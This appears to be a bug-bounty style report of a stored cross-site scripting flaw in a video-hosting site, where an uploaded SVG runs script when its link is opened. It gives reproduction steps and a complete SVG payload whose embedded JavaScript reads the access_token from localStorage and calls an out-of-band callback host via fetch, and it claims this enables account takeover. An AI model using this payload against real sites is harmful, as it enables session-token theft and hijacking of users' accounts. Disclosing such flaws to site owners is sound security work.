We can upload a SVG image and then send the url of that to other users and when they open the link we can get their complete session keys as the session keys stored in local storage and with Javascript easily can be stolen by attackers.
1.Go to https://interact.projectdiscovery.io/
and receive a url and replace it with xxxxxxxxxxxxxxxxxxx.xxxxxxxxxx
in image.SVG
.
2.upload image.SVG
file somewhere on website like NEW CHANNEL section and copy the link of SVG image after upload that already should be like this:
blob:https://tube.s1gm4.eu/3d2c5059-114f-4664-a7f6-0f9a96f480c6
3.Open the URL and you can see the user main access key( just for test I show one of the main local storage keys) and also you can see that in https://interact.projectdiscovery.io/
we receive some ping from tube.s1gm4.eu
.
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg
xmlns:svg="http://www.w3.org/2000/svg"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
style="overflow: hidden; position: relative;"
width="300"
height="200">
<image
x="10"
y="10"
width="276"
height="110"
xlink:href="http://images.google.com/intl/es_ALL/images/logos/images_logo_lg.gif"
stroke-width="1"
id="image3204" />
<rect
x="0"
y="150"
height="10"
width="300"
style="fill: black"/>
<script type="text/javascript">
const token = localStorage.getItem('access_token')
alert(token);
async function getUserInfo() {
const response = await fetch('https://xxxxxxxxxxxxxxxxxxx.xxxxxxxxxx')
}
getUserInfo();
</script>
</svg>
This vulnerability is capable of take control of user accounts.